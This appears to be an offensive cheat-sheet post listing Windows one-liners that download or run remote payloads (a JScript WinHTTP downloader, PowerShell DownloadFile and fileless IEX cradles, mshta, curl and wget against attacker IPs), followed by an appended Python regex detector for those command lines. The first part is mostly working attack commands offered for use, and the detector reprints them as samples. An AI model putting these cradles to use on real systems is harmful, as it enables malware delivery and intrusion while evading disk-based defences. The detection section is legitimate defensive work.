JS one-liner to download a payload
Every Windows version supports JScript out of the box, and running the script through cscript is enough to download a payload. The script below (dowfile2.js) takes the URL as its first argument.
// Fetch the URL passed as the first script argument over WinHTTP (synchronous request)
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
// Write the raw response body to disk through an ADODB binary stream
var BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1; // adTypeBinary
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("micropoor.exe");
BinStream.Close();
C:\test>cscript /nologo dowfile2.js http://192.168.1.1/eval.exe
The simplest option is still PowerShell:
powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://192.168.1.115/robots.txt','E:\robots.txt')
Remote command execution with nothing written to disk:
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.174.1:1234/evil.txt'))"
Running the following on the remote target host downloads and executes, again with nothing written to disk:
mshta http://192.168.174.1:1234/evil.hta
curl
curl http://192.168.174.1:1234/evil.exe -o evil.exe
wget
wget http://192.168.174.1:1234/evil.sh
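Every one-liner above leaves a distinctive process command line (Sysmon event ID 1 or Security 4688). Added here as a defender-side example that is not part of the original post: a small Python detector that scores command lines against those patterns, using the page's own commands plus two constructed benign lines as sample input.

```python
import re

# Constructed sample process-creation command lines; not real telemetry.
SAMPLE_COMMAND_LINES = [
    r'cscript /nologo dowfile2.js http://192.168.1.1/eval.exe',
    r"powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://192.168.1.115/robots.txt','E:\robots.txt')",
    r'''powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.174.1:1234/evil.txt'))"''',
    r'mshta http://192.168.174.1:1234/evil.hta',
    r'curl http://192.168.174.1:1234/evil.exe -o evil.exe',
    r'wget http://192.168.174.1:1234/evil.sh',
    r'cscript /nologo inventory.js',   # benign: script host with no URL argument
    r'powershell -c Get-Process',      # benign: no download cmdlet, no remote URL
]

URL = r'https?://'

# (rule name, case-insensitive regex over the full command line)
RULES = [
    ("script_host_url_arg",    re.compile(r'\b[wc]script(\.exe)?\b.*\.js\b.*' + URL, re.I)),
    ("ps_webclient_download",  re.compile(r'powershell.*(DownloadFile|DownloadString)', re.I)),
    ("ps_iex_remote",          re.compile(r'powershell.*\bIEX\b.*' + URL, re.I)),
    ("ps_hidden_window",       re.compile(r'powershell.*\s-w(indowstyle)?\s+hidden\b', re.I)),
    ("ps_exec_bypass",         re.compile(r'powershell.*\s-exec(utionpolicy)?\s+bypass\b', re.I)),
    ("mshta_remote",           re.compile(r'\bmshta(\.exe)?\s+' + URL, re.I)),
    ("curl_wget_remote_fetch", re.compile(r'\b(curl|wget)(\.exe)?\s+.*' + URL, re.I)),
]

def classify(cmdline):
    """Return the names of every rule that matches one command line, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(lines):
    """Return (cmdline, matched_rules) for each line that triggers at least one rule."""
    hits = []
    for line in lines:
        rules = classify(line)
        if rules:
            hits.append((line, rules))
    return hits

if __name__ == "__main__":
    for line, rules in scan(SAMPLE_COMMAND_LINES):
        print(", ".join(rules), "<-", line)
```

Command-line matching like this is a starting point, not a control: all of these binaries have legitimate uses, so tune against your own baseline and pair it with PowerShell script block logging and network egress monitoring.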